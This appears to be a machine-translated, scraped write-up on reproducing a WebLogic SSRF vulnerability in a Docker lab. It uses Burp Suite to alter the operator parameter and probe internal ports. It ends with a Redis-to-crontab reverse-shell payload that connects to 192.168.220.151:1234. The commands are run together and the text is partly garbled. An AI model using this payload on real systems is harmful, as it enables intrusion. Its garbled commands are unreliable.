How to realize the recurrence of Weblogic SSRF vulnerability

12-22-2023

First, use docker to build an environment docker installation and build an environment tutorial: https://www.freebuf.com/sectool/252257.html

Access port 7001

Second, the vulnerability reappearance step 1. Vulnerability page/UDDI Explorer/SearchPublicRegistries.jsp

2. Check out IBM and see

It is found to be a connection, so there may be ssrf.

3. Grab the bag with burp suite and click Search

4. Modify the connection of the operator parameter

5. The access result visits a nonexistent port and returns could not connect over HTTP.

Access to an existing port returns a status code.

Access intranet

Rebound shell's payloadset 1 "with redis. * * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1 "config set dir /etc/config set dbfilename crontabsave

Knowledge sharing community for developers。

Let more developers benefit from it。

Help developers share knowledge through the Internet。

Website navigation

Recommended platform: Hosting; Database; Development; Internet security; Internet technology; Privacy Notice; Agreement

How to realize the recurrence of Weblogic SSRF vulnerability

Recommended reading

Website navigation

high perspicacity

How to realize the recurrence of Weblogic SSRF vulnerability

Go to install nodejs